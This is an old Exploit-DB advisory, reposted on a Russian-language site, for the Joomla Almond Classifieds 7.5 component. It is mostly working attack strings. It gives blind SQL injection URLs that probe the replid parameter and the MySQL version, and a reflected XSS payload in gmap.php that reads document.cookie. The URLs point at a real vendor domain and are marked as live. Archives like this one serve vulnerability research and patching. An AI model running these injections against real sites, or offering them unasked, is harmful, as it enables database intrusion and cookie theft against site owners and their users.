- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9258
- Проверка EDB
-
- Пройдено
- Автор
- MOUDI
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-3155 cve-2009-3154
- Дата публикации
- 2009-07-27
Код:
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
[»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
[»] Joomla Component v.7.5 (com_aclassf) Multiple Remote Vulnerabilities
==============================================================================
[»] Script: [ Joomla Almond Classifieds v.7.5 ]
[»] Language: [ PHP ]
[»] Download: [ http://www.almondsoft.com ]
[»] Founder: [ Moudi <[email protected]> ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
[»] Team: [ EvilWay ]
[»] Dork: [ OFF ]
[»] Price: [ $195 ]
[»] Site : [ https://security-shell.ws/forum.php ]
###########################################################################
===[ Exploit + LIVE : BLIND SQL INJECTION vulnerability ]===
[»] http://www.site.com/patch/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=[BLIND]
[»] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438 and 1=1 <= TRUE
[»] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438 and 1=2 <= FALSE
[»] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5
=> TRUE
[»] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5
=> FALSE
===[ Exploit XSS + LIVE : vulnerability ]===
[»] http://www.site.com/patch/components/com_aclassf/gmap.php?addr=[XSS]
[»] http://www.almondsoft.com/j/components/com_aclassf/gmap.php?addr="><script>alert(document.cookie);</script>
Author: Moudi
###########################################################################
# milw0rm.com [2009-07-27]
- Источник
- www.exploit-db.com